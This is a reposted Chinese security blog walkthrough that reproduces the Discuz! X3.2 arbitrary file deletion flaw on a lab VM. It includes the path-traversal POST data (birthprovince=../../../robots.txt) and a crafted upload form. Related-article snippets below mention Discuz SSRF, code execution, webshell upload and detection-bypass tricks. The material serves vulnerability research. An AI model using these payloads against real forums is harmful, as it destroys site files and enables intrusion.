【研究】Discuz<3.4任意文件删除漏洞

最新推荐文章于 2023-10-05 11:43:37 发布
最新推荐文章于 2023-10-05 11:43:37 发布
阅读量258 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/peterpan0707007/p/7710776.html
版权

这里以Discuz3.2为例

关键字:
Powered by Discuz! X3.2

时间有限,就不一一截图了,Discuz所有页面全在Discuz_X3.2_SC_UTF8/upload/目录下

利用过程:

访问http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/robots.txt试试,这是我虚机中discuz中robots的路径,具体视个人情况而定

1、注册个帐号

2、提交数据

url地址栏:http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/home.php?mod=spacecp&ac=profile&op=base
POST数据:birthprovince=../../../robots.txt&profilesubmit=1&formhash=2bc7eb9a,这个formhash的值可以从源代码中找到,每次都不一样的

3、提交数据之后,打开设置界面,可以看到出生地变成../../../robots.txt

4、构造上传表单

<form action="http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/home.php?mod=spacecp&ac=profile&op=base" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="2bc7eb9a" /> //此formhash值和第三布formhash值一样
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="submit" />
</form>
上传成功后,返回空白页面,然后访问http://192.168.1.102/Discuz_X3.2_SC_UTF8/upload/robots.txt,发现robots.txt已被删除

转载于:https://www.cnblogs.com/peterpan0707007/p/7710776.html

weixin_30909575
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Discuz全版本任意文件删除漏洞
zsd747289639的博客
09-30 4845
Discuz全版本任意文件删除漏洞验证用的版本:discuz3.2 0x1首先在根目录下新建一个文件 0x2 构造poc1修改出生地区 注意其中的formhash需要替换掉,具体是在源码中找。 为什么这里要替换掉formhash呢? 一开始不太清楚,网页会报错,如下看到了有一个xss验证蛮去找一下这个文件private function _xss_check() { stat
Discuz X3.2版的任意文件删除漏洞
xd_12138的博客
11-28 8121
漏洞测试环境如下:PHP5.2+MYSQL+ Discuz X3.2   搭建好 Discuz X3.2环境后,首先在服务器下新建一个文本文档作为目标文件 然后按照正常用户步骤操作,登录论坛后在如下界面中点击  设置  跳转至下图界面 注意注意,重点来了 访问URL 为 http://10.1.1.100/discuz-X3.2/upload/home.php?mod=sp...
Discuz!X 3.4 任意文件删除漏洞复现过程(附python脚本)
weixin_33774883的博客
10-01 416
  今天看下群里在讨论Discuz!X 3.4 任意文件删除漏洞,自己做了一些测试,记录一下过程。结尾附上自己编写的python脚本,自动化实现任意文件删除。 具体漏洞,请查看 https://paper.seebug.org/411/ 0x01 环境搭建   到官网下载Discuz 3.4版本,phpstudy 本机搭建,并注册账号。站点根目录新建11...
Discuz!X 3.4 前台任意文件删除漏洞复现
weixin_30399155的博客
10-11 583
Discuz!X 3.4 前台任意文件删除漏洞复现 参考链接: http://www.freebuf.com/vuls/149904.html http://www.freebuf.com/articles/system/149810.html http://mp.weixin.qq.com/s?srcid=0930uM1OtfeAsXwHRrfZBIyo&scene=23&...
Discuz2.5-3.4任意文件删除漏洞分析
老北京砸酱锤的博客
06-22 606
Discuz!X ≤3.4 任意文件删除漏洞 Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。 2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。 修复建议 升级到最新版本的 Discuz! 实验环境 操作机:centos7 目标地址:192.168.0.105 Discuz版本:3.1 实验步骤 步骤1:了解原理 该漏洞于2014年6.
Discuz! X 3.4 ML 任意代码执行漏洞复现
墙角睡大觉的专栏
07-13 3925
0X1 漏洞概述 2019年7月11日,网络上出现了一个Discuz!ML远程代码执行漏洞的PoC,研究员验证分析发现,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码,执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。漏洞影响范围包括如下版本。 Discuz! ML v.3.4Discuz! ML v.3.3、Discuz...
利用Vulnhub复现漏洞 - Discuz!X ≤3.4 任意文件删除漏洞
JiangBuLiu的博客
06-28 3222
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现FormhashCookie发送数据包 Vulnhub官方复现教程 https://vulhub.org/#/environments/httpd/ssi-rce/ 漏洞原理 在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个...
Discuz!X ≤3.4 任意文件删除漏洞
haha1314的博客
07-15 3805
Discuz!X ≤3.4 任意文件删除漏洞 影响版本:Discuz!X ≤3.4 漏洞复现 访问http://your-ip/robots.txt可见robots.txt是存在的: [外链图片转存失败(img-Na16JIU5-1563163104782)(2.png)] 注册用户后,在个人设置页面找到自己的formhash: [外链图片转存失败(img-Lh7j02hX-15631631047...
dz x3 html,Discuz x3.4前台SSRF漏洞分析
weixin_30346025的博客
07-01 834
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前言2018年12月3日,@L3mOn公开了一个Discuz x3.4版本的前台SSRF,通过利用一个二次跳转加上两个解析问题,可以巧妙地完成SSRF攻击链。在和小伙伴@Dawu复现过程中发现漏洞本身依赖多个特性,导致可利用环境各种缩减和部分条件的强依赖关系大大减小了该漏洞的危害。后...
Discuz!ML 3.x任意代码执行漏洞
logan_logan的博客
07-29 1692
1.简介 影响系统及版本:Discuz!ML V3.2-3.4 漏洞原因:Discuz!ML系统对cookie中接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 2.环境搭建 网站环境:phpstudy_pro DisCuz版本:3.4 PHP版本:php5.4.45nts Apache版本:2.4.39 Mysql版本:5.7.26 3.Discuz安装 将源码复制到网站根目录下; 在网页输入地址打开安装界面,然后一直下一步就ok了; 4.漏洞复现 用火狐浏览器打开,
Discuz!X 3.4任意文件删除漏洞
最新发布
吾所在处,即为净土
10-05 692
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
网络安全实战之discuz上传漏洞利用
weixin_44255593的博客
02-16 5917
攻击思路: 想要拿下一台主机A的权限: 1、了解一下这个服务器:端口,服务器版本,操作系统版本。找漏洞 2、拿到对A有一定权限的身仹。如果对方是一个WEB服务器,就利用对方网站应用程序的漏洞,上传webshell然后提权 3、传上去后,得到apache用户普通权限,再提权成root 概述: 这突破在一个DZ X系列自带的转换工具里面。 漏洞路径:utility / convert / data / config.inc.php 漏洞发生的原因是:config.inc.php这个文件在黑客通过post写入时,
漏洞复现-DiscuzX ≤3.4 任意文件删除漏洞
qq_59350385的博客
05-10 898
一、环境搭建 本次用的是vulhub靶场 执行下列命令部署 Discuz!X 安装环境 docker-compose up -d 安装时,只用修改数据库地址为`db`,其他保持默认即可: 二、漏洞复现 (1)访问`http://your-ip/robots.txt`可见robots.txt是存在的: (2)注册用户hahaha (3)在个人设置页面找到自己的formhash (4)带上自己的Cookie、formhash发送如下数据包 (5)查看个人设置页面的出生地
Discuz!X 前台任意文件删除漏洞复现测试
黑面狐
09-30 4500
今天看到一个Discuz!X 前台任意文件删除漏洞。 自己本机搭建环境进行测试 环境搭建我用的是Discuz 3.4版本的。phpstudy  环境搭建完毕后,注册一个账号。 到达个人信息修改页面。 拦截数据包,修改birthprovince参数为文件站点存在的文件。。比如我要测试删除这个group.php文件。 发送包以后我们还要构造请求去执行删除文件
DZ拿shell总结
weixin_30600503的博客
01-23 782
今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下 Uc_server默认密码 其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码 可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-serv...
discuz论坛注入木马
小刚的博客
06-20 4661
今天试了一下很牛逼的一套流程 对discuz论坛挂马,利用菜刀上传webshell,并反向shell获取控制权,最后更改文件权限。 虽然是我看众多视频学来的,但很多知识还是挺有用的,今天就结合一下,搞一波我的虚拟机。 实验环境: VM搭建的虚拟测试环境 1.centos7安装的discuzs3.3论坛http://10.10.10.64/upload/forum.php 2.kali 10.10....
一句话木马绕过检测的常见思路
热门推荐
si1ence的博客
09-07 1万+
0x0 背景 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用,居家生活搞站越货必备神器。主要总结一下常见的绕过安全检测的思路,欢迎各位大佬参与讨论。 0x1 关键函数编码 主要通过一些字符串对关键的几个函数比如eval、assert等函数进行变换绕过检测 如下代码使用\x65编码字符串’e’,使用array类型进行混淆: &lt;?php array_ma...
discuz!ML 3.x代码执行漏洞的利用 笔记
边城浪子的博客
09-18 1371
服务器:windows 2003 攻击机:windows 10 搭建过程:下载discuz!ML 3.x源码 链接:https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw 提取码:5ka0 step1:在windows 2003中安装phpstudy step2:将源码中upload中的文件上传至phpstudy的www目录中。 step3:打...
Discuz!X安全漏洞详解
X 漏洞的整理涵盖了各种SQL注入漏洞,适用于渗透测试工程师和安全研究员学习研究。" Discuz! 是一个广泛使用的开源社区论坛软件,但随着时间的推移,它的一些历史版本中出现了一系列的安全漏洞,特别是SQL注入问题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值